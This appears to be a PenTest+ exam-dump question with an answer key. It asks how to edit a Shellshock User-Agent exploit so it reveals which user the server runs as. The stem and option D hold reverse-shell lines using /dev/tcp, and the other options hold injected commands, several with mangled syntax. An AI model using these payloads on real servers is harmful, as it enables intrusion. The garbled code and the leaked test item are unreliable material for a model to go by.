Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
autonumA penetration tester discovers a vulnerable web server at 10.10.1.1.
The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”,
“Accept”: “text/html,application/xhtml+xml,application/xml”}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci id;whoami”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
B . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& find / -perm -4000”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
C . exploits = {“User-Agent”: “() { ignored;};/bin/sh Ci ps Cef” 0>&1”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
D . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/10.10.1.1/80” 0>&1”,
“Accept”: “text/html,application/xhtml+xml,application/xml”}
Answer: A
Latest PT0-002 Dumps Valid Version with 110 Q&As
Latest And Valid Q&A | Instant Download | Once Fail, Full Refund